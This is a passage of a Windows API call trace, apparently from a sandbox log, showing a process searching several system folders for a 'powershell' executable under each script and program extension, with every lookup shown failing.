	[0877.211] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.211] SetErrorMode (uMode=0x1) returned 0x1
	[0877.211] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.211] SetErrorMode (uMode=0x1) returned 0x1
	[0877.211] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.211] SetErrorMode (uMode=0x1) returned 0x1
	[0877.212] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.212] SetErrorMode (uMode=0x1) returned 0x1
	[0877.212] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.212] SetErrorMode (uMode=0x1) returned 0x1
	[0877.212] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.212] SetErrorMode (uMode=0x1) returned 0x1
	[0877.213] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.213] SetErrorMode (uMode=0x1) returned 0x1
	[0877.213] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.213] SetErrorMode (uMode=0x1) returned 0x1
	[0877.213] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.213] SetErrorMode (uMode=0x1) returned 0x1
	[0877.214] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.214] SetErrorMode (uMode=0x1) returned 0x1
	[0877.214] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.214] SetErrorMode (uMode=0x1) returned 0x1
	[0877.214] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.215] SetErrorMode (uMode=0x1) returned 0x1
	[0877.215] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.215] SetErrorMode (uMode=0x1) returned 0x1
	[0877.215] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.215] SetErrorMode (uMode=0x1) returned 0x1
	[0877.215] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.215] SetErrorMode (uMode=0x1) returned 0x1
	[0877.216] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.216] SetErrorMode (uMode=0x1) returned 0x1
	[0877.216] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.216] SetErrorMode (uMode=0x1) returned 0x1
	[0877.216] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.217] SetErrorMode (uMode=0x1) returned 0x1
	[0877.217] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.217] SetErrorMode (uMode=0x1) returned 0x1
	[0877.217] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.927] SetErrorMode (uMode=0x1) returned 0x1
	[0877.927] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.928] SetErrorMode (uMode=0x1) returned 0x1
	[0877.928] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.928] SetErrorMode (uMode=0x1) returned 0x1
	[0877.928] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.928] SetErrorMode (uMode=0x1) returned 0x1
	[0877.928] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.929] SetErrorMode (uMode=0x1) returned 0x1
	[0877.929] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.929] SetErrorMode (uMode=0x1) returned 0x1
	[0877.929] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.929] SetErrorMode (uMode=0x1) returned 0x1
	[0877.929] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.930] SetErrorMode (uMode=0x1) returned 0x1
	[0877.930] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.930] SetErrorMode (uMode=0x1) returned 0x1
	[0877.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.930] SetErrorMode (uMode=0x1) returned 0x1
	[0877.930] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.931] SetErrorMode (uMode=0x1) returned 0x1
	[0877.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.931] SetErrorMode (uMode=0x1) returned 0x1
	[0877.931] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.931] SetErrorMode (uMode=0x1) returned 0x1
	[0877.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.932] SetErrorMode (uMode=0x1) returned 0x1
	[0877.932] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.932] SetErrorMode (uMode=0x1) returned 0x1
	[0877.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.932] SetErrorMode (uMode=0x1) returned 0x1
	[0877.932] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.932] SetErrorMode (uMode=0x1) returned 0x1
	[0877.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.933] SetErrorMode (uMode=0x1) returned 0x1
	[0877.933] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.933] SetErrorMode (uMode=0x1) returned 0x1
	[0877.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.934] SetErrorMode (uMode=0x1) returned 0x1
	[0877.934] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.934] SetErrorMode (uMode=0x1) returned 0x1
	[0877.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.934] SetErrorMode (uMode=0x1) returned 0x1
	[0877.934] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.935] SetErrorMode (uMode=0x1) returned 0x1
	[0877.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.935] SetErrorMode (uMode=0x1) returned 0x1
	[0877.935] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.935] SetErrorMode (uMode=0x1) returned 0x1
	[0877.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.936] SetErrorMode (uMode=0x1) returned 0x1
	[0877.936] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.936] SetErrorMode (uMode=0x1) returned 0x1
	[0877.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.939] SetErrorMode (uMode=0x1) returned 0x1
	[0877.939] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.939] SetErrorMode (uMode=0x1) returned 0x1
	[0877.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.940] SetErrorMode (uMode=0x1) returned 0x1
	[0877.940] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.940] SetErrorMode (uMode=0x1) returned 0x1
	[0877.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.941] SetErrorMode (uMode=0x1) returned 0x1
	[0877.941] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.941] SetErrorMode (uMode=0x1) returned 0x1
	[0877.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.941] SetErrorMode (uMode=0x1) returned 0x1
	[0877.941] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.942] SetErrorMode (uMode=0x1) returned 0x1
	[0877.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.942] SetErrorMode (uMode=0x1) returned 0x1
	[0877.942] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.942] SetErrorMode (uMode=0x1) returned 0x1
	[0877.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.943] SetErrorMode (uMode=0x1) returned 0x1
	[0877.943] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.943] SetErrorMode (uMode=0x1) returned 0x1
	[0877.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.943] SetErrorMode (uMode=0x1) returned 0x1
	[0877.943] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.944] SetErrorMode (uMode=0x1) returned 0x1
	[0877.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.944] SetErrorMode (uMode=0x1) returned 0x1
